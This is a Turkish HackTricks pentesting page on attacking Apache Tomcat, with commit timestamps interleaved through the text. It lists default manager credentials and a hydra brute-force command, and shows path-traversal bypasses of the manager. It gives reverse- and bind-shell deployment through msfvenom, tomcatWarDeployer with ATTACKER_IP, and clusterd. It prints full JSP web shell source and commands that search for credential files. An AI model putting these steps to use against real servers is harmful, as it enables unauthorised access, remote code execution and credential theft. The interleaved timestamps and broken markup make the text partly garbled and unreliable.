2024-04-06 19:40:41 +00:00
# Tomcat
2024-07-18 22:12:31 +00:00
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapı n:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCP Hacking'i öğrenin ve pratik yapı n: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-04-06 19:40:41 +00:00
< details >
2024-07-18 22:12:31 +00:00
< summary > HackTricks'i Destekleyin< / summary >
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
* [**abonelik planları nı ** ](https://github.com/sponsors/carlospolop ) kontrol edin!
* **💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) katı lı n ya da **Twitter'da** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**'i takip edin.**
* **Hacking ipuçları nı paylaşmak için** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github reposuna PR gönderin.
2024-04-06 19:40:41 +00:00
< / details >
2024-07-18 22:12:31 +00:00
{% endhint %}
2024-04-06 19:40:41 +00:00
2024-04-11 00:57:20 +00:00
**Try Hard Security Group**
2024-04-06 19:40:41 +00:00
< figure > < img src = "../../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
{% embed url="https://discord.gg/tryhardsecurity" %}
***
## Keşif
2024-07-18 22:12:31 +00:00
* Genellikle **port 8080** üzerinde çalı şı r
2024-04-06 19:40:41 +00:00
* **Yaygı n Tomcat hatası :**
2024-05-05 22:43:52 +00:00
< figure > < img src = "../../../.gitbook/assets/image (150).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
## Sayı m
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### **Versiyon Tanı mlama**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Apache Tomcat'in versiyonunu bulmak için basit bir komut çalı ştı rı labilir:
2024-04-06 19:40:41 +00:00
```bash
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
```
2024-07-18 22:12:31 +00:00
Bu, belgeler dizin sayfası nda "Tomcat" terimini arayacak ve HTML yanı tı nı n başlı k etiketinde sürümü ortaya çı karacaktı r.
2024-04-06 19:40:41 +00:00
### **Yönetici Dosyaları Konumu**
2024-07-18 22:12:31 +00:00
**`/manager`** ve ** `/host-manager` ** dizinlerinin tam konumları nı belirlemek önemlidir çünkü adları değiştirilebilir. Bu sayfaları bulmak için bir brute-force araması önerilir.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### **Kullanı cı Adı Sayı mı **
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Tomcat 6'dan daha eski sürümler için, kullanı cı adları nı saymak mümkündür:
2024-04-06 19:40:41 +00:00
```bash
msf> use auxiliary/scanner/http/tomcat_enum
```
### **Varsayı lan Kimlik Bilgileri**
2024-07-18 22:12:31 +00:00
**`/manager/html`** dizini, WAR dosyaları nı n yüklenmesine ve dağı tı lması na izin verdiği için özellikle hassastı r; bu da kod yürütmeye yol açabilir. Bu dizin, yaygı n kimlik bilgileri olan temel HTTP kimlik doğrulaması ile korunmaktadı r:
2024-04-06 19:40:41 +00:00
* admin:admin
* tomcat:tomcat
* admin:
* admin:s3cr3t
* tomcat:s3cr3t
* admin:tomcat
2024-05-05 22:43:52 +00:00
Bu kimlik bilgileri şu şekilde test edilebilir:
2024-04-06 19:40:41 +00:00
```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login
```
2024-07-18 22:12:31 +00:00
Başka bir dikkat çekici dizin ** `/manager/status` **'dı r; bu dizin Tomcat ve OS sürümünü gösterir, bu da zafiyetlerin belirlenmesine yardı mcı olur.
2024-05-05 22:43:52 +00:00
2024-07-18 22:12:31 +00:00
### **Brute Force Attack**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Yönetici dizinine brute force saldı rı sı denemek için şunlar kullanı labilir:
2024-04-06 19:40:41 +00:00
```bash
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
```
2024-07-18 22:12:31 +00:00
Along with setting various parameters in Metasploit to target a specific host.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
## Common Vulnerabilities
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### **Password Backtrace Disclosure**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
`/auth.jsp` erişimi, şanslı durumlarda bir backtrace altı nda parolanı n ifşa olması na neden olabilir.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### **Double URL Encoding**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
`mod_jk` içindeki CVE-2007-1860 açı ğı , özel olarak hazı rlanmı ş bir URL aracı lı ğı yla yönetim arayüzüne yetkisiz erişim sağlayan çift URL kodlaması yol geçişine izin verir.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Tomcat yönetim web'ine erişmek için: `pathTomcat/%252E%252E/manager/html` adresine gidin.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### /examples
Apache Tomcat sürümleri 4.x'ten 7.x'e kadar, bilgi ifşası na ve cross-site scripting (XSS) saldı rı ları na karşı hassas örnek betikler içerir. Bu betikler, yetkisiz erişim ve potansiyel istismar için kontrol edilmelidir. [daha fazla bilgi burada ](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/ ) bulun.
2024-04-06 19:40:41 +00:00
* /examples/jsp/num/numguess.jsp
* /examples/jsp/dates/date.jsp
* /examples/jsp/snp/snoop.jsp
* /examples/jsp/error/error.html
* /examples/jsp/sessions/carts.html
* /examples/jsp/checkbox/check.html
* /examples/jsp/colors/colors.html
* /examples/jsp/cal/login.html
* /examples/jsp/include/include.jsp
* /examples/jsp/forward/forward.jsp
* /examples/jsp/plugin/plugin.jsp
* /examples/jsp/jsptoserv/jsptoservlet.jsp
* /examples/jsp/simpletag/foo.jsp
* /examples/jsp/mail/sendmail.jsp
* /examples/servlet/HelloWorldExample
* /examples/servlet/RequestInfoExample
* /examples/servlet/RequestHeaderExample
* /examples/servlet/RequestParamExample
* /examples/servlet/CookieExample
* /examples/servlet/JndiServlet
* /examples/servlet/SessionExample
* /tomcat-docs/appdev/sample/web/hello.jsp
2024-07-18 22:12:31 +00:00
### **Path Traversal Exploit**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Bazı [**Tomcat'in savunması z yapı landı rmaları nda** ](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/ ) `/..;/` yolunu kullanarak Tomcat'teki korumalı dizinlere erişim sağlayabilirsiniz.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Örneğin, `www.vulnerable.com/lalala/..;/manager/html` adresine erişerek **Tomcat yöneticisi** sayfası na erişim sağlayabilirsiniz.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Bu hileyi kullanarak korumalı yolları atlatmanı n **başka bir yolu** , `http://www.vulnerable.com/;param=value/manager/html` adresine erişmektir.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
## RCE
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Son olarak, Tomcat Web Uygulama Yöneticisi'ne erişiminiz varsa, ** .war dosyası yükleyip dağı tabilirsiniz (kod çalı ştı rma)**.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### Limitations
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Sadece **yeterli ayrı calı klara** (roller: **admin** , **manager** ve **manager-script** ) sahip olduğunuzda bir WAR dağı tabilirsiniz. Bu ayrı ntı lar genellikle `/usr/share/tomcat9/etc/tomcat-users.xml` altı nda tanı mlanan _tomcat-users.xml_ dosyası nda bulunabilir (sürümlere göre değişir) (bkz. [POST ](./#post )section).
2024-04-06 19:40:41 +00:00
```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"
# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
```
2024-05-05 22:43:52 +00:00
### Metasploit
2024-04-06 19:40:41 +00:00
```bash
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost < IP >
msf exploit(multi/http/tomcat_mgr_upload) > set rport < port >
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername < username >
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword < password >
msf exploit(multi/http/tomcat_mgr_upload) > exploit
```
2024-07-18 22:12:31 +00:00
### MSFVenom Ters Shell
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
1. Dağı tmak için war dosyası nı oluşturun:
2024-04-06 19:40:41 +00:00
```bash
2024-04-11 00:57:20 +00:00
msfvenom -p java/jsp_shell_reverse_tcp LHOST=< LHOST_IP > LPORT=< LHOST_IP > -f war -o revshell.war
2024-04-06 19:40:41 +00:00
```
2024-07-18 22:12:31 +00:00
2. `revshell.war` dosyası nı yükleyin ve ona erişin (`/revshell/`):
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer) ile bağlama ve ters shell
2024-04-06 19:40:41 +00:00
2024-04-11 00:57:20 +00:00
Bazı senaryolarda bu çalı şmaz (örneğin eski sun sürümleri)
2024-04-06 19:40:41 +00:00
#### İndir
```bash
git clone https://github.com/mgeeky/tomcatWarDeployer.git
```
#### Ters kabuk
```bash
./tomcatWarDeployer.py -U < username > -P < password > -H < ATTACKER_IP > -p < ATTACKER_PORT > < VICTIM_IP > :< VICTIM_PORT > /manager/html/
```
2024-07-18 22:12:31 +00:00
#### Bind shell
2024-04-06 19:40:41 +00:00
```bash
./tomcatWarDeployer.py -U < username > -P < password > -p < bind_port > < victim_IP > :< victim_PORT > /manager/html/
```
### [Culsterd](https://github.com/hatRiot/clusterd) Kullanı mı
```bash
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
```
2024-07-18 22:12:31 +00:00
### Manuel yöntem - Web shell
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
**index.jsp** dosyası nı bu [içerikle ](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp ) oluşturun:
2024-04-06 19:40:41 +00:00
```java
< FORM METHOD = GET ACTION = 'index.jsp' >
< INPUT name = 'cmd' type = text >
< INPUT type = submit value = 'Run' >
< / FORM >
< %@ page import="java.io.*" %>
< %
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"< / br > "; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
< pre > < %=output %>< / pre >
```
```bash
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it
```
2024-07-18 22:12:31 +00:00
Bu da yükleme, indirme ve komut yürütme sağlar: [http://vonloesch.de/filebrowser.html ](http://vonloesch.de/filebrowser.html )
2024-04-07 03:13:19 +00:00
### Manuel Yöntem 2
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
[Bu ](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp ) gibi bir JSP web shell alı n ve bir WAR dosyası oluşturun:
2024-04-06 19:40:41 +00:00
```bash
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
```
## POST
2024-07-18 22:12:31 +00:00
Tomcat kimlik bilgileri dosyası nı n adı _tomcat-users.xml_ ’ dir.
2024-04-06 19:40:41 +00:00
```bash
find / -name tomcat-users.xml 2>/dev/null
```
2024-07-18 22:12:31 +00:00
Tomcat kimlik bilgilerini toplamanı n diğer yolları :
2024-04-06 19:40:41 +00:00
```bash
msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat
```
## Diğer tomcat tarama araçları
* [https://github.com/p0dalirius/ApacheTomcatScanner ](https://github.com/p0dalirius/ApacheTomcatScanner )
## Referanslar
* [https://github.com/simran-sankhala/Pentest-Tomcat ](https://github.com/simran-sankhala/Pentest-Tomcat )
* [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf ](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf )
**Try Hard Security Group**
< figure > < img src = "../../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
{% embed url="https://discord.gg/tryhardsecurity" %}
2024-07-18 22:12:31 +00:00
{% hint style="success" %}
AWS Hacking öğrenin ve pratik yapı n:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCP Hacking öğrenin ve pratik yapı n: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-04-06 19:40:41 +00:00
< details >
2024-07-18 22:12:31 +00:00
< summary > HackTricks'i Destekleyin< / summary >
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
* [**abonelik planları nı ** ](https://github.com/sponsors/carlospolop ) kontrol edin!
* **💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) katı lı n ya da **Twitter'da** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )** bizi takip edin.**
* **Hacking ipuçları nı [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github reposuna PR göndererek paylaşı n.**
2024-04-06 19:40:41 +00:00
< / details >
2024-07-18 22:12:31 +00:00
{% endhint %}